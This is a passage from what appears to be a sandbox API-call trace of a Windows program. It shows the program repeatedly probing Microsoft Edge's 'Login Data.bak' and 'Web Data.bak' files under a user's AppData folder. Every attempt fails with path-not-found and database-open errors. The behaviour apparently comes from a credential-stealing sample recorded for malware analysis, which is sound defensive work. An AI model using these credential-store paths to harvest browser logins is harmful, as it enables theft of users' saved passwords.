MemoryPointer=0x613440) returned 0x30 [0180.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="The system cannot find the path specified.\r\n", cchWideChar=-1, lpMultiByteStr=0x613440, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The system cannot find the path specified.\r\n", lpUsedDefaultChar=0x0) returned 45 [0180.438] LocalFree (hMem=0x6184d0) returned 0x0 [0180.438] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613440) returned 0x30 [0180.438] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.438] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625120) returned 0xa8 [0180.438] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625120 | out: hHeap=0x5f0000) returned 1 [0180.438] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x625c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0180.438] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa8) returned 0x625120 [0180.438] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625120) returned 0xa8 [0180.438] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x625c10, cbMultiByte=-1, lpWideCharStr=0x625120, cchWideChar=84 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.bak") returned 84 [0180.438] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.bak" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\edge\\user data\\default\\login data.bak"), fInfoLevelId=0x0, lpFileInformation=0x5cef70 | out: lpFileInformation=0x5cef70*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.438] GetLastError () returned 0x3 [0180.438] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.bak" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\edge\\user data\\default\\login data.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0180.438] GetLastError () returned 0x3 [0180.438] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x3, dwLanguageId=0x0, lpBuffer=0x5ced78, nSize=0x0, Arguments=0x0 | out: lpBuffer="袐a") returned 0x2c [0180.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="The system cannot find the path specified.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0180.438] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x613440 [0180.438] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613440) returned 0x30 [0180.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="The system cannot find the path specified.\r\n", cchWideChar=-1, lpMultiByteStr=0x613440, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The system cannot find the path specified.\r\n", lpUsedDefaultChar=0x0) returned 45 [0180.438] LocalFree (hMem=0x618890) returned 0x0 [0180.438] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613440) returned 0x30 [0180.438] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.438] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625120) returned 0xa8 [0180.438] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625120 | out: hHeap=0x5f0000) returned 1 [0180.439] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625960) returned 0x3c0 [0180.439] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625960 | out: hHeap=0x5f0000) returned 1 [0180.439] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x61ca60) returned 0x88 [0180.439] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61ca60 | out: hHeap=0x5f0000) returned 1 [0180.439] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x620960) returned 0x48 [0180.439] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620960 | out: hHeap=0x5f0000) returned 1 [0180.439] GetLastError () returned 0x3 [0180.439] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x618470) returned 0x58 [0180.439] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618470 | out: hHeap=0x5f0000) returned 1 [0180.439] GetProcessHeap () returned 0x5f0000 [0180.439] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2d) returned 0x613440 [0180.439] GetProcessHeap () returned 0x5f0000 [0180.439] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f280 [0180.439] lstrlenA (lpString="") returned 0 [0180.439] GetProcessHeap () returned 0x5f0000 [0180.439] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3b0 [0180.439] lstrcpyA (in: lpString1=0x61f3b0, lpString2="" | out: lpString1="") returned="" [0180.439] GetProcessHeap () returned 0x5f0000 [0180.439] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2d) returned 0x613b00 [0180.439] GetProcessHeap () returned 0x5f0000 [0180.439] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f300 [0180.439] ResetEvent (hEvent=0xc) returned 1 [0180.439] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.469] GetProcessHeap () returned 0x5f0000 [0180.469] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f300 | out: hHeap=0x5f0000) returned 1 [0180.469] GetProcessHeap () returned 0x5f0000 [0180.469] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613b00 | out: hHeap=0x5f0000) returned 1 [0180.469] GetProcessHeap () returned 0x5f0000 [0180.469] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3b0 | out: hHeap=0x5f0000) returned 1 [0180.469] GetProcessHeap () returned 0x5f0000 [0180.469] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f280 | out: hHeap=0x5f0000) returned 1 [0180.469] GetProcessHeap () returned 0x5f0000 [0180.469] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.469] lstrlenA (lpString="unable to open database file") returned 28 [0180.469] GetProcessHeap () returned 0x5f0000 [0180.469] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1d) returned 0x615d60 [0180.469] lstrcpyA (in: lpString1=0x615d60, lpString2="unable to open database file" | out: lpString1="unable to open database file") returned="unable to open database file" [0180.470] GetProcessHeap () returned 0x5f0000 [0180.470] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f3b0 [0180.470] lstrlenA (lpString="") returned 0 [0180.470] GetProcessHeap () returned 0x5f0000 [0180.470] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f470 [0180.470] lstrcpyA (in: lpString1=0x61f470, lpString2="" | out: lpString1="") returned="" [0180.470] GetProcessHeap () returned 0x5f0000 [0180.470] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1d) returned 0x615ea0 [0180.470] GetProcessHeap () returned 0x5f0000 [0180.470] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f300 [0180.470] ResetEvent (hEvent=0xc) returned 1 [0180.470] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.500] GetProcessHeap () returned 0x5f0000 [0180.500] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f300 | out: hHeap=0x5f0000) returned 1 [0180.500] GetProcessHeap () returned 0x5f0000 [0180.500] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.500] GetProcessHeap () returned 0x5f0000 [0180.500] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f470 | out: hHeap=0x5f0000) returned 1 [0180.500] GetProcessHeap () returned 0x5f0000 [0180.500] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3b0 | out: hHeap=0x5f0000) returned 1 [0180.500] GetProcessHeap () returned 0x5f0000 [0180.500] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615d60 | out: hHeap=0x5f0000) returned 1 [0180.500] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625090) returned 0x80 [0180.500] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625090 | out: hHeap=0x5f0000) returned 1 [0180.501] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625000) returned 0x80 [0180.501] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625000 | out: hHeap=0x5f0000) returned 1 [0180.501] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x611f60) returned 0x80 [0180.501] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.501] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615dc0) returned 0x20 [0180.501] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615dc0 | out: hHeap=0x5f0000) returned 1 [0180.501] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615ce0) returned 0x20 [0180.501] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ce0 | out: hHeap=0x5f0000) returned 1 [0180.501] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615ca0) returned 0x20 [0180.501] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.502] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613320) returned 0x30 [0180.502] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.502] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x624d50) returned 0x2a0 [0180.502] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624d50 | out: hHeap=0x5f0000) returned 1 [0180.502] GetProcessHeap () returned 0x5f0000 [0180.502] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624a20 | out: hHeap=0x5f0000) returned 1 [0180.502] GetProcessHeap () returned 0x5f0000 [0180.502] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.502] GetProcessHeap () returned 0x5f0000 [0180.502] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1b) returned 0x615f60 [0180.502] GetProcessHeap () returned 0x5f0000 [0180.502] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1b) returned 0x615ce0 [0180.502] GetProcessHeap () returned 0x5f0000 [0180.502] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f3b0 [0180.502] lstrlenA (lpString="") returned 0 [0180.502] GetProcessHeap () returned 0x5f0000 [0180.502] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3c0 [0180.503] lstrcpyA (in: lpString1=0x61f3c0, lpString2="" | out: lpString1="") returned="" [0180.503] GetProcessHeap () returned 0x5f0000 [0180.503] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1b) returned 0x615ca0 [0180.503] GetProcessHeap () returned 0x5f0000 [0180.503] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f350 [0180.503] ResetEvent (hEvent=0xc) returned 1 [0180.503] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.516] GetProcessHeap () returned 0x5f0000 [0180.516] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f350 | out: hHeap=0x5f0000) returned 1 [0180.516] GetProcessHeap () returned 0x5f0000 [0180.516] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.516] GetProcessHeap () returned 0x5f0000 [0180.516] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0180.516] GetProcessHeap () returned 0x5f0000 [0180.516] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3b0 | out: hHeap=0x5f0000) returned 1 [0180.516] GetProcessHeap () returned 0x5f0000 [0180.516] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ce0 | out: hHeap=0x5f0000) returned 1 [0180.516] GetProcessHeap () returned 0x5f0000 [0180.516] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.516] GetProcessHeap () returned 0x5f0000 [0180.516] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f330 [0180.516] GetProcessHeap () returned 0x5f0000 [0180.516] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f340 [0180.516] GetProcessHeap () returned 0x5f0000 [0180.516] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3b0 [0180.516] GetProcessHeap () returned 0x5f0000 [0180.516] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f470 [0180.516] GetProcessHeap () returned 0x5f0000 [0180.516] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f300 [0180.516] GetProcessHeap () returned 0x5f0000 [0180.517] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615d60 [0180.517] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.517] GetProcessHeap () returned 0x5f0000 [0180.517] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615d60 | out: hHeap=0x5f0000) returned 1 [0180.517] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cf540, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.517] GetProcessHeap () returned 0x5f0000 [0180.517] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f280 [0180.517] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.517] GetProcessHeap () returned 0x5f0000 [0180.517] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.517] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.517] GetProcessHeap () returned 0x5f0000 [0180.517] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.517] GetProcessHeap () returned 0x5f0000 [0180.517] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x8b) returned 0x61c820 [0180.517] GetProcessHeap () returned 0x5f0000 [0180.517] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x46) returned 0x6200f0 [0180.517] GetProcessHeap () returned 0x5f0000 [0180.517] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6200f0, Size=0x9b) returned 0x611f60 [0180.517] GetProcessHeap () returned 0x5f0000 [0180.517] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4e) returned 0x620730 [0180.517] GetProcessHeap () returned 0x5f0000 [0180.517] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620730, Size=0xa3) returned 0x624900 [0180.517] GetProcessHeap () returned 0x5f0000 [0180.517] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f300, Size=0x52) returned 0x618710 [0180.518] GetProcessHeap () returned 0x5f0000 [0180.518] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.518] GetProcessHeap () returned 0x5f0000 [0180.518] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.518] GetProcessHeap () returned 0x5f0000 [0180.518] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c820 | out: hHeap=0x5f0000) returned 1 [0180.518] GetProcessHeap () returned 0x5f0000 [0180.518] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.518] GetProcessHeap () returned 0x5f0000 [0180.518] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f280 | out: hHeap=0x5f0000) returned 1 [0180.518] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.518] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Web Data.bak") returned 0 [0180.518] GetProcessHeap () returned 0x5f0000 [0180.518] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618710 | out: hHeap=0x5f0000) returned 1 [0180.518] GetProcessHeap () returned 0x5f0000 [0180.518] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f470 | out: hHeap=0x5f0000) returned 1 [0180.518] GetProcessHeap () returned 0x5f0000 [0180.518] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1f) returned 0x615ea0 [0180.518] GetProcessHeap () returned 0x5f0000 [0180.518] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1f) returned 0x615f60 [0180.518] GetProcessHeap () returned 0x5f0000 [0180.519] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f300 [0180.519] lstrlenA (lpString="") returned 0 [0180.519] GetProcessHeap () returned 0x5f0000 [0180.519] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f310 [0180.519] lstrcpyA (in: lpString1=0x61f310, lpString2="" | out: lpString1="") returned="" [0180.519] GetProcessHeap () returned 0x5f0000 [0180.519] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1f) returned 0x615ca0 [0180.519] GetProcessHeap () returned 0x5f0000 [0180.519] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f320 [0180.519] ResetEvent (hEvent=0xc) returned 1 [0180.519] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.554] GetProcessHeap () returned 0x5f0000 [0180.554] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f320 | out: hHeap=0x5f0000) returned 1 [0180.554] GetProcessHeap () returned 0x5f0000 [0180.554] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.554] GetProcessHeap () returned 0x5f0000 [0180.554] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f310 | out: hHeap=0x5f0000) returned 1 [0180.554] GetProcessHeap () returned 0x5f0000 [0180.554] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f300 | out: hHeap=0x5f0000) returned 1 [0180.554] GetProcessHeap () returned 0x5f0000 [0180.554] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.554] GetProcessHeap () returned 0x5f0000 [0180.554] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.554] GetProcessHeap () returned 0x5f0000 [0180.554] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f310 [0180.554] GetProcessHeap () returned 0x5f0000 [0180.555] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615dc0 [0180.555] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.555] GetProcessHeap () returned 0x5f0000 [0180.555] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615dc0 | out: hHeap=0x5f0000) returned 1 [0180.555] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cf590, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.555] GetProcessHeap () returned 0x5f0000 [0180.555] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f360 [0180.555] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.555] GetProcessHeap () returned 0x5f0000 [0180.555] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.556] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.556] GetProcessHeap () returned 0x5f0000 [0180.556] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.556] GetProcessHeap () returned 0x5f0000 [0180.556] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x8b) returned 0x61c820 [0180.556] GetProcessHeap () returned 0x5f0000 [0180.556] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x46) returned 0x6209b0 [0180.556] GetProcessHeap () returned 0x5f0000 [0180.556] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6209b0, Size=0x9b) returned 0x611f60 [0180.556] GetProcessHeap () returned 0x5f0000 [0180.556] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4e) returned 0x6207d0 [0180.556] GetProcessHeap () returned 0x5f0000 [0180.556] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6207d0, Size=0xa3) returned 0x624900 [0180.556] GetProcessHeap () returned 0x5f0000 [0180.556] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f310, Size=0x52) returned 0x6188f0 [0180.556] GetProcessHeap () returned 0x5f0000 [0180.556] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.557] GetProcessHeap () returned 0x5f0000 [0180.557] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.557] GetProcessHeap () returned 0x5f0000 [0180.557] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c820 | out: hHeap=0x5f0000) returned 1 [0180.557] GetProcessHeap () returned 0x5f0000 [0180.557] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.557] GetProcessHeap () returned 0x5f0000 [0180.557] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f360 | out: hHeap=0x5f0000) returned 1 [0180.557] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.557] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Web Data.bak") returned 0 [0180.558] GetProcessHeap () returned 0x5f0000 [0180.558] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6188f0 | out: hHeap=0x5f0000) returned 1 [0180.558] GetProcessHeap () returned 0x5f0000 [0180.558] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613320 [0180.558] GetProcessHeap () returned 0x5f0000 [0180.558] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613440 [0180.558] GetProcessHeap () returned 0x5f0000 [0180.558] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f3c0 [0180.558] lstrlenA (lpString="") returned 0 [0180.558] GetProcessHeap () returned 0x5f0000 [0180.558] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f470 [0180.558] lstrcpyA (in: lpString1=0x61f470, lpString2="" | out: lpString1="") returned="" [0180.558] GetProcessHeap () returned 0x5f0000 [0180.558] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613740 [0180.558] GetProcessHeap () returned 0x5f0000 [0180.559] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f3d0 [0180.559] ResetEvent (hEvent=0xc) returned 1 [0180.559] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.601] GetProcessHeap () returned 0x5f0000 [0180.601] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3d0 | out: hHeap=0x5f0000) returned 1 [0180.601] GetProcessHeap () returned 0x5f0000 [0180.601] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613740 | out: hHeap=0x5f0000) returned 1 [0180.601] GetProcessHeap () returned 0x5f0000 [0180.601] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f470 | out: hHeap=0x5f0000) returned 1 [0180.601] GetProcessHeap () returned 0x5f0000 [0180.601] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0180.601] GetProcessHeap () returned 0x5f0000 [0180.601] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.601] GetProcessHeap () returned 0x5f0000 [0180.602] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.602] GetProcessHeap () returned 0x5f0000 [0180.602] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3c0 [0180.602] GetProcessHeap () returned 0x5f0000 [0180.602] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ca0 [0180.602] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.602] GetProcessHeap () returned 0x5f0000 [0180.602] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.602] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cf2c0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.602] GetProcessHeap () returned 0x5f0000 [0180.602] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f470 [0180.602] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.603] GetProcessHeap () returned 0x5f0000 [0180.603] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.603] lstrcpyA (in: lpString1=0x613440, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") 